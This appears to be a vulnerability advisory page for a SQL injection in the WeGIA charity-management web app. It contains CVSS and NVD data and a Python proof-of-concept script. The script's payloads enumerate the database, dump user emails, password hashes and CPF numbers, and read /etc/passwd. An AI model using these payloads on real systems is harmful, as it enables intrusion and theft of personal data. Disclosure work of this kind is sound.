Security Vulnerability Report
中文
CVE-2026-23723 CVSS 7.2 HIGH

CVE-2026-23723

Published: 2026-01-16 20:15:50
Last Modified: 2026-01-30 18:28:52
Source: [email protected]

Description

WeGIA is a web manager for charitable institutions. Prior to 3.6.2, an authenticated SQL Injection vulnerability was identified in the Atendido_ocorrenciaControle endpoint via the id_memorando parameter. This flaw allows for full database exfiltration, exposure of sensitive PII, and potential arbitrary file reads in misconfigured environments. This vulnerability is fixed in 3.6.2.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:wegia:wegia:*:*:*:*:*:*:*:* - VULNERABLE
WeGIA < 3.6.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-23723 SQL Injection PoC # Target: WeGIA < 3.6.2 # Endpoint: Atendido_ocorrenciaControle # Parameter: id_memorando target_url = "http://target-server/WeGIA/Atendido_ocorrenciaControle" # Authentication (requires high privilege account) login_url = "http://target-server/WeGIA/login.php" credentials = { "username": "admin_user", "password": "password" } session = requests.Session() # Login to obtain authenticated session login_response = session.post(login_url, data=credentials) if "authenticated" not in login_response.text: print("[-] Authentication failed") sys.exit(1) print("[+] Successfully authenticated") # SQL Injection payloads payloads = [ # Basic injection to confirm vulnerability "1' OR '1'='1", # Union-based injection for data extraction "1' UNION SELECT NULL,NULL,NULL,version(),user()-- -", # Database enumeration "1' UNION SELECT schema_name,NULL,NULL,NULL,NULL FROM information_schema.schemata-- -", # Table enumeration "1' UNION SELECT table_name,NULL,NULL,NULL,NULL FROM information_schema.tables WHERE table_schema='wegia'-- -", # Column enumeration "1' UNION SELECT column_name,NULL,NULL,NULL,NULL FROM information_schema.columns WHERE table_name='usuario'-- -", # Data exfiltration "1' UNION SELECT id_usuario,email,senha_hash,nome,cpf FROM usuario-- -", # File read (if privileged) "1' UNION SELECT NULL,NULL,LOAD_FILE('/etc/passwd'),NULL,NULL-- -" ] for i, payload in enumerate(payloads): params = {"id_memorando": payload} try: response = session.get(target_url, params=params, timeout=10) print(f"\n[Payload {i+1}]: {payload}") print(f"Status: {response.status_code}") if "SQL" in response.text or "error" in response.text.lower(): print("[!] Potential SQL error detected") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23723", "sourceIdentifier": "[email protected]", "published": "2026-01-16T20:15:50.163", "lastModified": "2026-01-30T18:28:51.853", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WeGIA is a web manager for charitable institutions. Prior to 3.6.2, an authenticated SQL Injection vulnerability was identified in the Atendido_ocorrenciaControle endpoint via the id_memorando parameter. This flaw allows for full database exfiltration, exposure of sensitive PII, and potential arbitrary file reads in misconfigured environments. This vulnerability is fixed in 3.6.2."}, {"lang": "es", "value": "WeGIA es un gestor web para instituciones benéficas. Antes de la 3.6.2, se identificó una vulnerabilidad de inyección SQL autenticada en el endpoint Atendido_ocorrenciaControle a través del parámetro id_memorando. Esta falla permite la exfiltración completa de la base de datos, la exposición de PII sensible y posibles lecturas arbitrarias de archivos en entornos mal configurados. Esta vulnerabilidad está corregida en la 3.6.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wegia:wegia:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.6.2", "matchCriteriaId": "419B3A85-5754-4198-A73E-92A9DA8E7A68"}]}]}], "references": [{"url": "https://github.com/LabRedesCefetRJ/WeGIA/pull/1333", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/LabRedesCefetRJ/WeGIA/releases/tag/3.6.2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-xfmp-2hf9-gfjp", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.